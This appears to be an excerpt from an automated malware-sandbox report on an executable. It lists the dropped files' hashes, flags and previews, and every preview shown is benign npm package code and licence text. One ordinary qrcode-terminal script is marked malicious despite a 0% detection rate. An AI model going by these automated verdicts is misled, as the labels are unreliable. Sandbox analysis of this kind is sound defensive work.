              Preview:{. "author": "Roman Shtylman <shtylman@gmail.com>",. "name": "process",. "description": "process information for node.js and browsers",. "keywords": [. "process". ],. "scripts": {. "test": "mocha test.js",. "browser": "zuul --no-coverage --ui mocha-bdd --local 8080 -- test.js". },. "version": "0.11.10",. "repository": {. "type": "git",. "url": "git://github.com/shtylman/node-process.git". },. "license": "MIT",. "browser": "./browser.js",. "main": "./index.js",. "engines": {. "node": ">= 0.6.0". },. "devDependencies": {. "mocha": "2.2.1",. "zuul": "^3.10.3". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6310
              Entropy (8bit):4.322005054078189
              Encrypted:false
              SSDEEP:
              MD5:DAD686D55576B88074B7F570AE6FF77D
              SHA1:5DF489D709DEF7DA4EF99BA2B9D8E4AA17834B0E
              SHA-256:22067AFBB201BA00A54446214F07447CEC8C5B2A7B9FB11F1A6E79C64B8FCD4F
              SHA-512:8E0E0BA7E07A858775EFF6A6D0AD7918D03DFDBB4610723DDEA1AC5A48E58EE8C73BB8858E1BDA4A34991AC318E6EA0255C220ED3EB1774EE4518ECF63F069BD
              Malicious:false
              Reputation:unknown
              Preview:var assert = require('assert');.var ourProcess = require('./browser');.describe('test against our process', function () {. test(ourProcess);.});.if (!process.browser) {. describe('test against node', function () {. test(process);. });. vmtest();.}.function test (ourProcess) {. describe('test arguments', function () {. it ('works', function (done) {. var order = 0;... ourProcess.nextTick(function (num) {. assert.equal(num, order++, 'first one works');. ourProcess.nextTick(function (num) {. assert.equal(num, order++, 'recursive one is 4th');. }, 3);. }, 0);. ourProcess.nextTick(function (num) {. assert.equal(num, order++, 'second one starts');. ourProcess.nextTick(function (num) {. assert.equal(num, order++, 'this is third');. ourProcess.nextTick(function (num) {. assert.equal(num, order++, 'this is last');
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):694
              Entropy (8bit):4.388453226954743
              Encrypted:false
              SSDEEP:
              MD5:593D6F60010BF59A0D35447AEDC3DDDC
              SHA1:DCFEBEE5D98D5A0EE186FE20F050A4845373A77F
              SHA-256:D73D2201981F5C083F8CD7B8D80927E466C53A03DBEA80167D7E67B918F7412D
              SHA-512:0D9EDCCB830B210F6F750146CB40AB0F2F59D70C66B3AE062EA12342C07F3930A6D163B3DDCADBF1700DF160AAE5876C7696FCA988079410157934DD7C10FFA9
              Malicious:false
              Reputation:unknown
              Preview:const allSettled =. Promise.allSettled ? promises => Promise.allSettled(promises). : promises => {. const reflections = []. for (let i = 0; i < promises.length; i++) {. reflections[i] = Promise.resolve(promises[i]).then(value => ({. status: 'fulfilled',. value,. }), reason => ({. status: 'rejected',. reason,. })). }. return Promise.all(reflections). }..module.exports = promises => allSettled(promises).then(results => {. let er = null. const ret = new Array(results.length). results.forEach((result, i) => {. if (result.status === 'rejected'). throw result.reason. else. ret[i] = result.value. }). return ret.}).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):552
              Entropy (8bit):4.681550525070522
              Encrypted:false
              SSDEEP:
              MD5:6ABCF438D306CB5CB8BB15F8DFFB7114
              SHA1:C88AA929D83FB2BBF326F7C62103DA6B8C48C4DF
              SHA-256:EF9CE306616FE550AAEFDB5D3770BF9D0DDDCE3B512BCA8F1E621F0401850FAE
              SHA-512:30E73B9396659BB8003868B3CF4FC6FAFC5C376F15C965FCD91C8831EB2A37A57261E97CD47AC63E54D3ADB113E11CDC9705B930CC8295224C3A71C193125294
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "promise-all-reject-late",. "version": "1.0.1",. "description": "Like Promise.all, but save rejections until all promises are resolved",. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^14.10.5". },. "funding": {. "url": "https://github.com/sponsors/isaacs". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2337
              Entropy (8bit):4.44309540936077
              Encrypted:false
              SSDEEP:
              MD5:1D65EB526FD8D5970F9350169919A33C
              SHA1:E917634B9F5D0DE16AC1F33B715BDA861BAA0F54
              SHA-256:4A391DCB5E1D8E57D5598F760D8764EF95D4F80CF4A1DD3CDA845C0AD9B0B782
              SHA-512:D3856A544A8A391E0C9F4C711C24168B370FECC1417985A7B932498142C6AB20AE283F75B0D3CFD643EB5AC8F9B1931540DD5C9C86ED845CCE35A777D3F6F545
              Malicious:false
              Reputation:unknown
              Preview:const t = require('tap')..const main = () => {. if (process.argv[2] === 'polyfill-all-settled') {. Promise.allSettled = null. runTests(). } else if (process.argv[2] === 'native-all-settled') {. Promise.allSettled = Promise.allSettled || (. promises => {. const reflections = []. for (let i = 0; i < promises.length; i++) {. reflections[i] = Promise.resolve(promises[i]).then(value => ({. status: 'fulfilled',. value,. }), reason => ({. status: 'rejected',. reason,. })). }. return Promise.all(reflections). }. ). runTests(). } else {. t.spawn(process.execPath, [__filename, 'polyfill-all-settled']). t.spawn(process.execPath, [__filename, 'native-all-settled']). }.}..const runTests = () => {. const lateFail = require('../').. t.test('fail only after all promises resolve', t => {. let resolvedSlow = false. const fast = () => Promise.reject('nope'). con
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1084
              Entropy (8bit):4.467464112466234
              Encrypted:false
              SSDEEP:
              MD5:4CEB4B0139E4B9CDCB5625BD67FAC25E
              SHA1:B1E9A2466334609CF11F73DFD1858CF3A439D3BE
              SHA-256:D9ECC07E3A306457B300A415DD43BDFAC6D9031655E09269751A34508F840D59
              SHA-512:F719FBD88E91996014E8BD59A34087300943891B9E47BFB5DDD13DCA3869C96C3DFB87187868C65CCDC9765B1FE41223EC1A63499B267D41C778B7CF81C84F7C
              Malicious:false
              Reputation:unknown
              Preview:const os = require('os').// availableParallelism available only since node v19, for older versions use.// cpus() cpus() can return an empty list if /proc is not mounted, use 1 in.// this case../* istanbul ignore next - version-specific workaround */.const defLimit = 'availableParallelism' in os. ? os.availableParallelism(). : Math.max(1, os.cpus().length)..const callLimit = (queue, limit = defLimit) => new Promise((res, rej) => {. let active = 0. let current = 0. const results = [].. let rejected = false. const reject = er => {. if (rejected). return. rejected = true. rej(er). }.. let resolved = false. const resolve = () => {. if (resolved || active > 0). return. resolved = true. res(results). }.. const run = () => {. const c = current++. if (c >= queue.length) {. return resolve(). }.. active ++. results[c] = queue[c]().then(result => {. active --. results[c] = result. run(). return result. }, reject).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):705
              Entropy (8bit):4.670102147389005
              Encrypted:false
              SSDEEP:
              MD5:1141FB1F6C3AA45E92831DB0ADC9080B
              SHA1:0B3DAC2023557B54608B83BB6C4B81DEBE6F8B9B
              SHA-256:913DB4A5E96B59C392DAEFCF8980E8D81E97DD1658EB26929EEFE2D865F725BA
              SHA-512:57260BF13F47A1A6F05B46B2853CBC18DBC5D24332A7BB77C75974D74CB8D1E9E0DBF1D10C714417304C0C16745D5F8E95C1A22AC726AFE440EF3E9AEB10D25A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "promise-call-limit",. "version": "1.0.2",. "files": [. "index.js". ],. "description": "Call an array of promise-returning functions, restricting concurrency to a specified limit.",. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/promise-call-limit". },. "author": "Isaac Z. Schlueter <i@izs.me> (https://izs.me)",. "license": "ISC",. "scripts": {. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "tap": {. "check-coverage": true. },. "devDependencies": {. "tap": "^16.0.0". },. "funding": {. "url": "https://github.com/sponsors/isaacs". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):752
              Entropy (8bit):5.0549042450081485
              Encrypted:false
              SSDEEP:
              MD5:CEE2D39676C27439ADB09D8F5ABA5A5B
              SHA1:0FFB767143AE572D4ECFDA5BF2C7C5B28F5AB4C7
              SHA-256:51FF8BFB2F9F25978427F17D2B65CAE0F23FC6BFC9060E96FB2F5A7EAC141631
              SHA-512:013AB7CCF616508382373402FAB7AACAA05D4D2EF6D92DC5BB38D5BA2270102292EBA3C86E328E42A387773D727E072322C48E6934E04DA219AF46D88A52596B
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2017, Rebecca Turner <me@re-becca.org>..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF.OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):842
              Entropy (8bit):4.56768365714357
              Encrypted:false
              SSDEEP:
              MD5:0CE81D5E3069C97383C25BD77AF0A7DA
              SHA1:3497D3F68DA94B182FACEB82C268925084F2F705
              SHA-256:6A6018EE750117314D70E541AC5AE86AB080A417F8D01BB7E931917CA3C6A0C7
              SHA-512:6C86010319102FED9E7CB3D34E2FA279FED88F91E788A9D3BEE4CD6B48916653891332A58447EA9903170EA3A94CAF1233307E5BF765A524DC29DDE4DB6B7355
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.module.exports = inflight..let Bluebird.try {. Bluebird = require('bluebird').} catch (_) {. Bluebird = Promise.}..const active = {}.inflight.active = active.function inflight (unique, doFly) {. return Bluebird.all([unique, doFly]).then(function (args) {. const unique = args[0]. const doFly = args[1]. if (Array.isArray(unique)) {. return Bluebird.all(unique).then(function (uniqueArr) {. return _inflight(uniqueArr.join(''), doFly). }). } else {. return _inflight(unique, doFly). }. }).. function _inflight (unique, doFly) {. if (!active[unique]) {. active[unique] = (new Bluebird(function (resolve) {. return resolve(doFly()). })). active[unique].then(cleanup, cleanup). function cleanup() { delete active[unique] }. }. return active[unique]. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):669
              Entropy (8bit):4.768701461397772
              Encrypted:false
              SSDEEP:
              MD5:3A21697372DAE2F10C45F32F045E079F
              SHA1:46BE8C622D5A7A8C74A905DF7EAFB893FDB8A965
              SHA-256:386697EBBF39442F0570D59C851E00CA22330A0A5CE3F389B621F6A0D6D7517A
              SHA-512:9B456D83FD71276BF865E24995B59065CDF318D7CF3DBC1E68B44D3E09D31F3BD83D2A13FD8B2B3C936F0E326EB5415727DA6B646F5E9EF05B02323386BF5495
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "promise-inflight",. "version": "1.0.1",. "description": "One promise for multiple requests in flight to avoid async duplication",. "main": "inflight.js",. "files": [. "inflight.js". ],. "license": "ISC",. "scripts": {. "test": "echo \"Error: no test specified\" && exit 1". },. "keywords": [],. "author": "Rebecca Turner <me@re-becca.org> (http://re-becca.org/)",. "devDependencies": {},. "repository": {. "type": "git",. "url": "git+https://github.com/iarna/promise-inflight.git". },. "bugs": {. "url": "https://github.com/iarna/promise-inflight/issues". },. "homepage": "https://github.com/iarna/promise-inflight#readme".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1056
              Entropy (8bit):5.096434668549062
              Encrypted:false
              SSDEEP:
              MD5:D81E220DEE93FDBCBF7696CC76CEC0A0
              SHA1:45C1476739D0C028C845B2C90C401C3A4435DE04
              SHA-256:B1344BD78EBCBF8A359225EC444D038A653C6A5F9ECF405A50D4A5C11FBF27D1
              SHA-512:87D4CBE6D76D68BA0A75EF51526A27F37A3FD259C06CC4DD14D2422F8FECB26F735396CE5E100AF5162DA0E611CA8C8C97E1CC28909A6D0074E34762C39FBB2B
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2014 IndigoUnited..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is furnished.to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1378
              Entropy (8bit):4.033792815220406
              Encrypted:false
              SSDEEP:
              MD5:239EEF71FD065E06455822AFAAA632CD
              SHA1:5E61EDABC276F8FC4F061F3995ED85053DE489C5
              SHA-256:93C1B8FF5FD1FDB14105573D7EEC21351894CE3C5F86090CA6A33FB89D65D559
              SHA-512:425BCF1D25F9F6C1C4AD4912B552F09549C9C7D0114919515DB5949F903D73107D71A80896025F3D05574BF64690840C68A53EF989981E40AE4885B116F08300
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var errcode = require('err-code');.var retry = require('retry');..var hasOwn = Object.prototype.hasOwnProperty;..function isRetryError(err) {. return err && err.code === 'EPROMISERETRY' && hasOwn.call(err, 'retried');.}..function promiseRetry(fn, options) {. var temp;. var operation;.. if (typeof fn === 'object' && typeof options === 'function') {. // Swap options and fn when using alternate signature (options, fn). temp = options;. options = fn;. fn = temp;. }.. operation = retry.operation(options);.. return new Promise(function (resolve, reject) {. operation.attempt(function (number) {. Promise.resolve(). .then(function () {. return fn(function (err) {. if (isRetryError(err)) {. err = err.retried;. }.. throw errcode(new Error('Retrying'), 'EPROMISERETRY', { retried: err });. }, number
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):843
              Entropy (8bit):4.686015646992139
              Encrypted:false
              SSDEEP:
              MD5:86B2710422FBFFF57EA48D15DB220487
              SHA1:FC649CBEDEA73287DB37A431E5761E9C0B4ABCA9
              SHA-256:71C2995725304FFA82E03BE2C21E83F3B7C0C557846DF88AAED0F2B9FA75D911
              SHA-512:06513E59B0A0F450FBBA5BAE106C8BACDE19234BC380E4C8102BC1BFED20B287186F9E6BDEF831E4923CC1CB43009111699D8E3BC1FE70B3406C5C0130998EA5
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "promise-retry",. "version": "2.0.1",. "description": "Retries a function that returns a promise, leveraging the power of the retry module.",. "main": "index.js",. "scripts": {. "test": "mocha --bail -t 10000". },. "bugs": {. "url": "https://github.com/IndigoUnited/node-promise-retry/issues/". },. "repository": {. "type": "git",. "url": "git://github.com/IndigoUnited/node-promise-retry.git". },. "keywords": [. "retry",. "promise",. "backoff",. "repeat",. "replay". ],. "author": "IndigoUnited <hello@indigounited.com> (http://indigounited.com)",. "license": "MIT",. "devDependencies": {. "expect.js": "^0.3.1",. "mocha": "^8.0.1",. "sleep-promise": "^8.0.1". },. "dependencies": {. "err-code": "^2.0.2",. "retry": "^0.12.0". },. "engines": {. "node": ">=10". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7385
              Entropy (8bit):3.931950159468841
              Encrypted:false
              SSDEEP:
              MD5:26CAD688D896D22728C8DD945E5D5A9B
              SHA1:8A94ACE50109B5A2DD47272D433E09FDF986AEFC
              SHA-256:C89C47A4C5FB1E1EDEC10DC693CE623BDFCF9C721FA621ADE12249BB50BC7BF2
              SHA-512:27C041769659F172A8F578A729818ECDAC0B508678AAED7A3E565D2919F76843BCE7C5B16185E2687E2CABEB3FF9211164A6A1B26B73835FA9C0C3140B099809
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var expect = require('expect.js');.var promiseRetry = require('../');.var promiseDelay = require('sleep-promise');..describe('promise-retry', function () {. it('should call fn again if retry was called', function () {. var count = 0;.. return promiseRetry(function (retry) {. count += 1;.. return promiseDelay(10). .then(function () {. if (count <= 2) {. retry(new Error('foo'));. }.. return 'final';. });. }, { factor: 1 }). .then(function (value) {. expect(value).to.be('final');. expect(count).to.be(3);. }, function () {. throw new Error('should not fail');. });. });.. it('should call fn with the attempt number', function () {. var count = 0;.. return promiseRetry(function (retry, number) {. count += 1;. expect(count).to.equal(number);..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):4611
              Entropy (8bit):4.548870281714874
              Encrypted:false
              SSDEEP:
              MD5:E90528EAD6F552EBE9DF5F8E6D33347D
              SHA1:B6394A8118C9249F5214B00DA7F1D061B63CAE7F
              SHA-256:3F34CE89F337CDE74298BFB12D070B41E0D7770FB38D11940433F7896F07ABB8
              SHA-512:8791684215E661EDB504CE8AD5F323BF06CA12DC45155A28A2A1593DBBD87E1D142822790B2148DE29D6C9D9FA8D32F3B41D386FE2902ECA3BC47033A193674D
              Malicious:false
              Reputation:unknown
              Preview:const fs = require('fs/promises').const { runInThisContext } = require('vm').const { promisify } = require('util').const { randomBytes } = require('crypto').const { Module } = require('module').const { dirname, basename } = require('path').const read = require('read')..const files = {}..class PromZard {. #file = null. #backupFile = null. #ctx = null. #unique = randomBytes(8).toString('hex'). #prompts = [].. constructor (file, ctx = {}, options = {}) {. this.#file = file. this.#ctx = ctx. this.#backupFile = options.backupFile. }.. static async promzard (file, ctx, options) {. const pz = new PromZard(file, ctx, options). return pz.load(). }.. static async fromBuffer (buf, ctx, options) {. let filename = 0. do {. filename = '\0' + Math.random(). } while (files[filename]). files[filename] = buf. const ret = await PromZard.promzard(filename, ctx, options). delete files[filename]. return ret. }.. async load () {. if (files[this.#file])
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1080
              Entropy (8bit):4.6875166509965265
              Encrypted:false
              SSDEEP:
              MD5:725993BF3237555A5F6537DB0D6DF865
              SHA1:33E1CCFDD2AA70DA195227872286EAE7B8822C6B
              SHA-256:98CD4BC6BB20DF03BFDC2B04E3E21DC9063F8698DA1DA9909F55E4D6F5C7F2BD
              SHA-512:51DD339C4DCE2772E0AACD4B4D0FC28DCE81C30EE31D732580964A4B305E373213B6C73308D0E17D471DF84C326D45DCC6FC0DB6250DD743D7D29924DE7BB89D
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "GitHub Inc.",. "name": "promzard",. "description": "prompting wizardly",. "version": "1.0.0",. "repository": {. "url": "https://github.com/npm/promzard.git",. "type": "git". },. "dependencies": {. "read": "^2.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.11.0",. "tap": "^16.3.0". },. "main": "lib/index.js",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "license": "ISC",. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template-oss": "This file is partially managed by @npmcli/template-oss. Edits may be overwritten.",. "version": "4.11.0". },. "tap": {. "jobs": 1,. "test-ignore": "fixtu
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):11962
              Entropy (8bit):4.502329851472076
              Encrypted:false
              SSDEEP:
              MD5:BEED67299FFF1E7B91B5E4C3E43B505B
              SHA1:5A73F7DF836211D62EA50414AC906BDB27D0E65B
              SHA-256:B3C7A2FADB2515B8106EAE58439A4B9C0581A4EAA88D6A265701F8D4DD7DADB8
              SHA-512:0CCAA0C030E7A1EDC9DEE988C59D70A0411A7148F39CDBC992671F578ACC0EA4951D31EF7578C6DFA6FDF7E71ED702D7AE5DEC3D571EF5CB46A787856BFA6BE1
              Malicious:false
              Reputation:unknown
              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):1836
              Entropy (8bit):4.688572105945058
              Encrypted:false
              SSDEEP:
              MD5:F017DB946A8CB746E185221AF6FD3968
              SHA1:B3BBAE2A2B8914A48B5894F98E08935029BBBDA3
              SHA-256:CA492212F6251D730AAAF738262819C9A9AA3FC81D5AF51FAB47094913E69F74
              SHA-512:0491971DD69ACD5E8775A75BEB2E5A16885E2BA080D5158131C46F8C1AA1EE1BA1E65534FF82AC25333BAA2B5211055CEC6B7CD48C349030F007FAFB3E5C1527
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node../*!. * Module dependencies.. */..var qrcode = require('../lib/main'),. path = require('path'),. fs = require('fs');../*!. * Parse the process name. */..var name = process.argv[1].replace(/^.*[\\\/]/, '').replace('.js', '');../*!. * Parse the input. */..if (process.stdin.isTTY) {. // called with input as argument, e.g.:. // ./qrcode-terminal.js "INPUT".. var input = process.argv[2];. handleInput(input);.} else {. // called with piped input, e.g.:. // echo "INPUT" | ./qrcode-terminal.js.. var readline = require('readline');.. var interface = readline.createInterface({. input: process.stdin,. output: process.stdout,. terminal: false. });.. interface.on('line', function(line) {. handleInput(line);. });.}../*!. * Process the input. */..function handleInput(input) {.. /*!. * Display help. */.. if (!input || input === '-h' || input === '--help') {. help();. process.exit();. }
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):74
              Entropy (8bit):4.518122075141497
              Encrypted:false
              SSDEEP:
              MD5:8DCFCD4F9508C872625615D98AAFB770
              SHA1:B3A16EFFCC17B7453FB25A25A7264B5A781EEF52
              SHA-256:B6B366FA1A8D2DEAA3882225DB93923E925E8F916BE0EF3705B3D606604D1167
              SHA-512:7CEE4BE80837E0C19E746196357DA0D110D4428BE7D8DDA2BDFAC049E7A585B6EC4380731767795FB1115A71BE989A383A33382D6FB042A20B77F2B5B11A37A5
              Malicious:false
              Reputation:unknown
              Preview:var qrcode = require('../lib/main');.qrcode.generate('this is the bomb');.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):119
              Entropy (8bit):4.564816757324317
              Encrypted:false
              SSDEEP:
              MD5:8FD66427DF68D7FE46DD656C1E8D2E1F
              SHA1:939795207A399A8EF862216943BCD4AC64AAAA15
              SHA-256:7358434A4BEFF2ABD47931DB1585362D056CDFA0E263F4F13267213A70B64703
              SHA-512:969991A6F5B965C604B304B38C9EFAC18CB00757DE365AE71661D2E02DCB066865E586A83C46250C6D3D3D1CAB83336FD1E1D3EA8B23980B09327E87788D198B
              Malicious:false
              Reputation:unknown
              Preview:var qrcode = require('../lib/main');.qrcode.generate('someone sets it up', function (str) { . console.log(str);.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):150
              Entropy (8bit):4.668567197171544
              Encrypted:false
              SSDEEP:
              MD5:5585634723A123A4ABB6E95D4A22B5B9
              SHA1:3637CBE23F309A37ACB1F87A01901E886E4D553F
              SHA-256:76BF2CC6C22836D74DB7BB7CF49F4B874A29A2B41B33836F371E930F17124821
              SHA-512:3B84FE16A632CB2106D395C1B5738D907A94B984DF3F7BA372607F446A906A8A31502468800206A339338256CE478DF78576532170B61C192194332A876614B6
              Malicious:false
              Reputation:unknown
              Preview:var qrcode = require('../lib/main'),. url = 'https://google.com/';..qrcode.generate(url, { small: true }, function (qr) {. console.log(qr);.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Algol 68 source, ASCII text
              Category:dropped
              Size (bytes):3121
              Entropy (8bit):4.328177386504733
              Encrypted:false
              SSDEEP:
              MD5:ACEB29AE6CFB4D0DF74A7739976C6744
              SHA1:ACDDBA923AED6D5DD708EBD4489B4707A072B97E
              SHA-256:FA88A331A51DD411F8F0F068CFB8D88280CAFA65554FB18BF8AEE1F4325EF699
              SHA-512:ED0DB3AF9A40CAA975EB692873D452B7C7842A8FECA648988AA00AFA169EB3F747E7BF64F12894DFD8F28DC445E94CAD073A4CCA6A37562018ADE26D6664FF2A
              Malicious:false
              Reputation:unknown
              Preview:var QRCode = require('./../vendor/QRCode'),. QRErrorCorrectLevel = require('./../vendor/QRCode/QRErrorCorrectLevel'),. black = "\033[40m \033[0m",. white = "\033[47m \033[0m",. toCell = function (isBlack) {. return isBlack ? black : white;. },. repeat = function (color) {. return {. times: function (count) {. return new Array(count).join(color);. }. };. },. fill = function(length, value) {. var arr = new Array(length);. for (var i = 0; i < length; i++) {. arr[i] = value;. }. return arr;. };..module.exports = {.. error: QRErrorCorrectLevel.L,.. generate: function (input, opts, cb) {. if (typeof opts === 'function') {. cb = opts;. opts = {};. }.. var qrcode = new QRCode(-1, this.error);. qrcode.addData(input);. qrcode.make();.. var output = '';. if (opts && opts.small) {. var B
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):971
              Entropy (8bit):4.704397391326757
              Encrypted:false
              SSDEEP:
              MD5:AB8DC5A699D7F7435CF98830283A6B11
              SHA1:4A84AC3DECFE9F31DA851B98DEDD698F935B83BC
              SHA-256:25C89A03126B144A0080C0200A25037D0F2FB0A49177506776CFB492210955CD
              SHA-512:0F29EB2C5B4F5BC55F2CC7F85E704E78FF1B702F63560FCF6C58C04300268FF3F042F671FBC819AC195FC2663777EC0F2587F3FAE38D72FE6B5846F3A4C491BF
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "qrcode-terminal",. "keywords": ["ansi", "ascii", "qrcode", "console"],. "version" : "0.12.0",. "description" : "QRCodes, in the terminal",. "homepage": "https://github.com/gtanner/qrcode-terminal",. "repository": {. "type": "git",. "url": "https://github.com/gtanner/qrcode-terminal". },. "contributors": [{. "name": "Gord Tanner",. "email": "gtanner@gmail.com",. "url": "http://github.com/gtanner". }, {. "name": "Michael Brooks",. "email": "mikeywbrooks@gmail.com",. "url": "http://github.com/mwbrooks". }],. "licenses": [{. "type": "Apache 2.0". }],. "main": "./lib/main",. "bin": {. "qrcode-terminal": "./bin/qrcode-terminal.js". },. "preferGlobal": false,. "devDependencies": {. "sinon": "*",. "mocha": "*",. "expect.js": "*",. "jshint": "*". },. "scripts": {. "test": "./node_modules/jshint/bin/jshint lib vendor && node example/basic.js && ./node_modules/mocha/bin/mocha -R nyan". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2044
              Entropy (8bit):3.9415063976187636
              Encrypted:false
              SSDEEP:
              MD5:C1755065E4AD084C23A184E1D456D158
              SHA1:74D3A7EA2E730621FDF3620052AEF16C379C4BE3
              SHA-256:D435CF3A0D361D7B7250A34EF88DA1CF7826301300211BB24CC20D18C00A2E9F
              SHA-512:32721E147E171705DB654D8CE6B8E008FBBEE6C3EC1ECED08CF4D7C1C278C84826DB7D3C461725B3F43FF4A3932950438E2AB51AAE6445CE596CE60032B953D6
              Malicious:false
              Reputation:unknown
              Preview:var expect = require('expect.js'),. qrcode = require('./../lib/main'),. sinon = require('sinon');..describe('in the main module', function() {. describe('the generate method', function () {. describe('when not providing a callback', function () {. beforeEach(function () {. sinon.stub(console, 'log');. });.. afterEach(function () {. sinon.sandbox.restore();. console.log.reset();. });.. it('logs to the console', function () {. qrcode.generate('test');. expect(console.log.called).to.be(true);. });. });.. describe('when providing a callback', function () {. it('will call the callback', function () {. var cb = sinon.spy();. qrcode.generate('test', cb);. expect(cb.called).to.be(true);. });.. it('will not call the console.log method', function () {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):382
              Entropy (8bit):5.146585838983688
              Encrypted:false
              SSDEEP:
              MD5:DFF38A2F2FD61503AB6F032200D7C3B8
              SHA1:A00A9988E826BE4F7F57E050CAE9A17F09220321
